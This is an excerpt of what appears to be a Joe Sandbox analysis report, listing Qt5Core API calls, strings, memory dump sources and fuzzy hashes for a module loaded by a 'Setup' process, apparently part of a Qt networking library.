                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH0@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA197852D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA197853D
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA1978547
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$Array@@$String@@$Variant@@$?size@$Logger@@Message$?reserve@Device@@$?begin@?cend@?data@?resize@?warning@Array@@@Char@@Open@Readable@V0@@Valid@
                                                                                                                                                              • String ID: 1.0$; boundary="$MIME-Version$alternative$could not open device for reading$device is not readable$form-data$mixed$multipart/$related
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Url@@$Array@@ByteFormatting$ComponentFlags@Option@V0@@$?lock@?password@?setDateEmpty@Encoded@Fragment@Locker@@Mode@1@@MutexMutex@@Option@2@@@@ParsingTime@@Url@@@@@V0@$$
                                                                                                                                                              • String ID: auth:
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A43750: ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA1A43864
                                                                                                                                                                • Part of subcall function 00007FFBA1A43750: ??1QMutexLocker@@QEAA@XZ.QT5CORE ref: 00007FFBA1A43880
                                                                                                                                                              • ?size@QListData@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D3F0
                                                                                                                                                              • ?indexOf@QByteArray@@QEBAHPEBDH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D407
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D41A
                                                                                                                                                              • ?at@QByteArray@@QEBADH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D429
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D438
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D474
                                                                                                                                                              • ?at@QByteArray@@QEBADH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D483
                                                                                                                                                              • ?indexOf@QByteArray@@QEBAHPEBDH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D4A3
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D4B6
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D4C3
                                                                                                                                                              • ?at@QByteArray@@QEBADH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D4D6
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D4E5
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D50A
                                                                                                                                                              • ?at@QByteArray@@QEBADH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D51D
                                                                                                                                                              • ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D531
                                                                                                                                                              • ?fromRawData@QByteArray@@SA?AV1@PEBDH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D54B
                                                                                                                                                              • ?fromBase64@QByteArray@@SA?AV1@AEBV1@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D55C
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D567
                                                                                                                                                              • ?begin@QByteArray@@QEAAPEADXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D575
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D588
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1A3D5DA
                                                                                                                                                              • ?detach_grow@QListData@@QEAAPEAUData@1@PEAHH@Z.QT5CORE ref: 00007FFBA1A3D5F4
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1A3D600
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1A3D615
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1A3D65B
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1A3D667
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA1A3D6E5
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1A3D6EE
                                                                                                                                                              • ?append@QListData@@QEAAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D71C
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D746
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@ByteData@@List$?size@String@@$?begin@$?at@$?dispose@?from?indexData@1@@$?append@?data@?detach_grow@?end@Base64@Char@@Data@Data@1@Locker@@MutexV1@@
                                                                                                                                                              • String ID: -----BEGIN CERTIFICATE-----$-----END CERTIFICATE-----
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$String$Ref@@$Char@@$Array$Data@@$?child?data@CaseChar@@@ChildEvent@Event@@@Latin1Object@@Qt@@@Sensitivity@$Flags@$?indexBasicEmpty@Int@Timer@@U1@_$?allocate@?contains@?deallocate@?mid?mid@?split@?truncate@AllocationBehaviorData@@@@@Option@Qt@@@@Ref@Ref@@@@SplitString@String@@@Vector@mallocmemcmp
                                                                                                                                                              • String ID:
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$Settings@@String@@$Variant@@$Array@@DataStream@@$String@@@$Data@@$Group@$?fromDateListTime@@$?begin?end?status@ArrayArray@@@Latin1Null@Status@1@$?begin@?can?child?contains@?data@?dispose@?end@?remove@?shared?value@Array@BasicConvert@Data@1@@Epoch@Hex@Keys@Latin1@List@@Mutex@@SecsSinceStringTimer@@Utf8@V1@@V1@_V2@@Writable@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4171179546-0
                                                                                                                                                              • Opcode ID: 5b499121672674d11233187d4b6458919e74297b9d959554a7af2a1ca2e6752c
                                                                                                                                                              • Instruction ID: 5325e955d718637c9476f540c9b46239981e5b033c361ef9189c1209e5363ac5
                                                                                                                                                              • Opcode Fuzzy Hash: 5b499121672674d11233187d4b6458919e74297b9d959554a7af2a1ca2e6752c
                                                                                                                                                              • Instruction Fuzzy Hash: 6CA14DB2B0A90285EB52DF35E8541FC2371FB50BA9B448432CE1E57668EF3CE54ACB40
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QObject@@QEAA@PEAV0@@Z.QT5CORE ref: 00007FFBA19DDFD1
                                                                                                                                                                • Part of subcall function 00007FFBA198C090: ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19DDFEA), ref: 00007FFBA198C0D3
                                                                                                                                                                • Part of subcall function 00007FFBA198C090: ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA198C107
                                                                                                                                                                • Part of subcall function 00007FFBA198C090: ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA198C114
                                                                                                                                                                • Part of subcall function 00007FFBA19DEBB0: ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19DDFEF), ref: 00007FFBA19DEBF3
                                                                                                                                                                • Part of subcall function 00007FFBA19DEBB0: ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA19DEC27
                                                                                                                                                                • Part of subcall function 00007FFBA19DEBB0: ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA19DEC34
                                                                                                                                                                • Part of subcall function 00007FFBA198BFC0: ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19DDFF4), ref: 00007FFBA198C003
                                                                                                                                                                • Part of subcall function 00007FFBA198BFC0: ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA198C037
                                                                                                                                                                • Part of subcall function 00007FFBA198BFC0: ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA198C044
                                                                                                                                                                • Part of subcall function 00007FFBA19E0CE0: ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA197481C), ref: 00007FFBA19E0CFB
                                                                                                                                                              • ?isEmpty@QString@@QEBA_NXZ.QT5CORE ref: 00007FFBA19DE003
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA19DE010
                                                                                                                                                                • Part of subcall function 00007FFBA19DF9E0: ?lock@QMutex@@QEAAXXZ.QT5CORE(?,?,?,?,?,?,00007FFBA19DF4D2,?,?,?,?,?,00007FFBA19733DE,?,?,00000000), ref: 00007FFBA19DFA44
                                                                                                                                                                • Part of subcall function 00007FFBA19DF9E0: ?currentThread@QThread@@SAPEAV1@XZ.QT5CORE ref: 00007FFBA19DFA73
                                                                                                                                                                • Part of subcall function 00007FFBA19DF9E0: ?mainThread@QCoreApplicationPrivate@@SAPEAVQThread@@XZ.QT5CORE ref: 00007FFBA19DFA7C
                                                                                                                                                                • Part of subcall function 00007FFBA19DF9E0: ?qAddPreRoutine@@YAXP6AXXZ@Z.QT5CORE ref: 00007FFBA19DFA8E
                                                                                                                                                                • Part of subcall function 00007FFBA19DF9E0: ?qAddPostRoutine@@YAXP6AXXZ@Z.QT5CORE ref: 00007FFBA19DFA9B
                                                                                                                                                                • Part of subcall function 00007FFBA19DF9E0: ??1QMutexLocker@@QEAA@XZ.QT5CORE ref: 00007FFBA19DFB33
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA19DE0A4
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA19DE0D2
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA19DE0DC
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA19DE0E9
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA19DE137
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA19DE2EB
                                                                                                                                                                • Part of subcall function 00007FFBA19E38E0: ?lock@QMutex@@QEAAXXZ.QT5CORE(?,?,?,00007FFBA19DE044), ref: 00007FFBA19E38F9
                                                                                                                                                                • Part of subcall function 00007FFBA19E38E0: ?unlock@QMutex@@QEAAXXZ.QT5CORE(?,?,?,00007FFBA19DE044), ref: 00007FFBA19E390F
                                                                                                                                                                • Part of subcall function 00007FFBA19DFF00: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA19DFF46
                                                                                                                                                                • Part of subcall function 00007FFBA19DFF00: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA19DFF50
                                                                                                                                                                • Part of subcall function 00007FFBA19DFF00: ??1QRecursiveMutex@@QEAA@XZ.QT5CORE ref: 00007FFBA19DFF5A
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA19DE19F
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19DE1A9
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA19DE1CA
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19DE1D4
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA19DE1F5
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19DE1FF
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA19DE220
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19DE22A
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA19DE24B
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19DE255
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA19DE276
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19DE280
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA19DE2A1
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19DE2AB
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Object@@$Connection@$Type@$Array@@Byte$?connect@ConnectionQt@@@$String@@$Data@@List$Mutex@@$?dispose@?normalized?registerData@1@@Flag@Flags@NormalizedObject@@@TypeType@@Type@@@@$?lock@Routine@@Thread@Thread@@$?begin@?current?end@?main?unlock@ApplicationCoreEmpty@Locker@@MutexPostPrivate@@RecursiveV0@@
                                                                                                                                                              • String ID: 2closed()$2error(QNetworkSession::SessionError)$2newConfigurationActivated()$2opened()$2preferredConfigurationChanged(QNetworkConfiguration,bool)$2quitPendingWaitsForOpened()$2stateChanged(QNetworkSession::State)$2usagePoliciesChanged(QNetworkSession::UsagePolicies)
                                                                                                                                                              • API String ID: 2736771781-3682561693
                                                                                                                                                              • Opcode ID: 9034e9dd034d76131aa49d37d2bb5700c10db79e03b9e39803805a24487d3ac1
                                                                                                                                                              • Instruction ID: 0ce4c6cc7637f206df8176826a74b638e9d05e0bf815475f54cceebc83717044
                                                                                                                                                              • Opcode Fuzzy Hash: 9034e9dd034d76131aa49d37d2bb5700c10db79e03b9e39803805a24487d3ac1
                                                                                                                                                              • Instruction Fuzzy Hash: 65A16BB6A0AB0686EB918F75E4902BD3360FB48B98F404536DE5E47B58EF3CD549CB00
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Url@@$ComponentFlags@FormattingOption@Url@@@@@$??8@?password@Empty@String@@0@V0@@$?userArray@@ByteName@Null@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2456552722-0
                                                                                                                                                              • Opcode ID: 0ee22ea1343d740c472d9ea4d5f5b36ab57fbd8db8839d3334eb38b49da3415a
                                                                                                                                                              • Instruction ID: 810d5a73d7dbd74f018cd54451273a06449149e6b221093f9df5203a9ee58237
                                                                                                                                                              • Opcode Fuzzy Hash: 0ee22ea1343d740c472d9ea4d5f5b36ab57fbd8db8839d3334eb38b49da3415a
                                                                                                                                                              • Instruction Fuzzy Hash: FFA185A2B1A61299FB82DB75D8542FC2361BF41BA8F844036CD1E1B6D5EF3CD54ACB10
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Array@@Byte$V0@@$Data@@$ArrayEmpty@$DateHashLogger@@MessageNull@Time@@$??8@?allocate?allocate@?clear@?data@?lock@?shared?warning@?willAllocationChar@@Concurrency::details::stl_critical_section_win7::stl_critical_section_win7Data@@@@@Flags@Grow@Hash@@Locker@@MutexMutex@@Node@Option@String@@0@U1@_
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 467423237-0
                                                                                                                                                              • Opcode ID: e03d315c306d1c350d4ceb407d7689921ae2fcd02ce315d992aca46ba8cc60cb
                                                                                                                                                              • Instruction ID: 20158fb38eaf01933ed4c85a6ad5b8688d6459de0937393cf00c1d6840bb718d
                                                                                                                                                              • Opcode Fuzzy Hash: e03d315c306d1c350d4ceb407d7689921ae2fcd02ce315d992aca46ba8cc60cb
                                                                                                                                                              • Instruction Fuzzy Hash: B8A13DA2B0A90296EB92DF75E8541FC2361FF50B98F804032DD1E566A5EF3CE54ACB50
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$Data@@List$String@@$?begin@$V0@@$?dispose@Data@1@@Device@@Url@@$FileFormattingString@$?append@?clear@?detach_grow@?end@?error?error@?read@?reserve@?resize@?size@?translate@Application@@ComponentCoreData@1@Empty@Error@1@Flags@Option@Option@2@@@@
                                                                                                                                                              • String ID: QNetworkAccessFileBackend$Read error reading from %1: %2
                                                                                                                                                              • API String ID: 273609537-2818182500
                                                                                                                                                              • Opcode ID: 069985e4d407bcde0d8cc8ced109c637190525ea491311534cda21004b16bec7
                                                                                                                                                              • Instruction ID: 09acf3c3da4131ad92870c134d6eba95432a4f1deb76e9c443bedd5a421e87b2
                                                                                                                                                              • Opcode Fuzzy Hash: 069985e4d407bcde0d8cc8ced109c637190525ea491311534cda21004b16bec7
                                                                                                                                                              • Instruction Fuzzy Hash: DA9185B2F0AA0295EB82DF35D8540FC2361BF447A9B904532DE2E57694EF3CD58ACB50
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWritable@QSettings@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1683
                                                                                                                                                              • ?sync@QSettings@@QEAAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A192D
                                                                                                                                                                • Part of subcall function 00007FFBA19A12A0: ??0QString@@QEAA@VQLatin1String@@@Z.QT5CORE ref: 00007FFBA19A12D3
                                                                                                                                                                • Part of subcall function 00007FFBA19A12A0: ?beginGroup@QSettings@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FFBA19A12E1
                                                                                                                                                                • Part of subcall function 00007FFBA19A12A0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA19A12EC
                                                                                                                                                                • Part of subcall function 00007FFBA19A12A0: ??0QString@@QEAA@VQLatin1String@@@Z.QT5CORE ref: 00007FFBA19A131B
                                                                                                                                                                • Part of subcall function 00007FFBA19A12A0: ?beginGroup@QSettings@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FFBA19A1329
                                                                                                                                                                • Part of subcall function 00007FFBA19A12A0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA19A1334
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A16B3
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A16C2
                                                                                                                                                              • ?toUtf8@QString@@QEGBA?AVQByteArray@@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A16F9
                                                                                                                                                              • ?toHex@QByteArray@@QEBA?AV1@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1706
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1710
                                                                                                                                                              • ?fromLatin1@QString@@SA?AV1@AEBVQByteArray@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A171E
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1728
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1732
                                                                                                                                                                • Part of subcall function 00007FFBA1994440: ?isValid@QDateTime@@QEBA_NXZ.QT5CORE(?,?,00000000,00007FFBA19A1740), ref: 00007FFBA199445A
                                                                                                                                                                • Part of subcall function 00007FFBA1994440: ?currentDateTimeUtc@QDateTime@@SA?AV1@XZ.QT5CORE(?,?,00000000,00007FFBA19A1740), ref: 00007FFBA1994470
                                                                                                                                                                • Part of subcall function 00007FFBA1994440: ??MQDateTime@@QEBA_NAEBV0@@Z.QT5CORE(?,?,00000000,00007FFBA19A1740), ref: 00007FFBA1994481
                                                                                                                                                                • Part of subcall function 00007FFBA1994440: ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA19A1740), ref: 00007FFBA199449C
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A174C
                                                                                                                                                              • ??0QDataStream@@QEAA@PEAVQByteArray@@V?$QFlags@W4OpenModeFlag@QIODevice@@@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1760
                                                                                                                                                                • Part of subcall function 00007FFBA1991640: ??0QDateTime@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA19A1772), ref: 00007FFBA1991653
                                                                                                                                                              • ?toMSecsSinceEpoch@QDateTime@@QEBA_JXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1775
                                                                                                                                                              • ??6QDataStream@@QEAAAEAV0@_J@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1782
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A178C
                                                                                                                                                              • ??6QDataStream@@QEAAAEAV0@_N@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A17A1
                                                                                                                                                              • ?status@QDataStream@@QEBA?AW4Status@1@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A17AB
                                                                                                                                                              • ??1QDataStream@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A17BD
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A17C7
                                                                                                                                                              • ?contains@QSettings@@QEBA_NAEBVQString@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A17D5
                                                                                                                                                              • ?remove@QSettings@@QEAAXAEBVQString@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A17E7
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A17F1
                                                                                                                                                              • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1834
                                                                                                                                                              • ??0QVariant@@QEAA@AEBVQByteArray@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1847
                                                                                                                                                              • ?setValue@QSettings@@QEAAXAEBVQString@@AEBVQVariant@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1859
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1863
                                                                                                                                                              • ??1QDataStream@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A186D
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1877
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1893
                                                                                                                                                              • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A18C7
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A18E0
                                                                                                                                                              • ?endGroup@QSettings@@QEAAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A190F
                                                                                                                                                              • ?endGroup@QSettings@@QEAAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1919
                                                                                                                                                                • Part of subcall function 00007FFBA1994410: ?host@QUrl@@QEBA?AVQString@@V?$QFlags@W4ComponentFormattingOption@QUrl@@@@@Z.QT5CORE(?,?,?,00007FFBA19A16F2), ref: 00007FFBA1994420
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
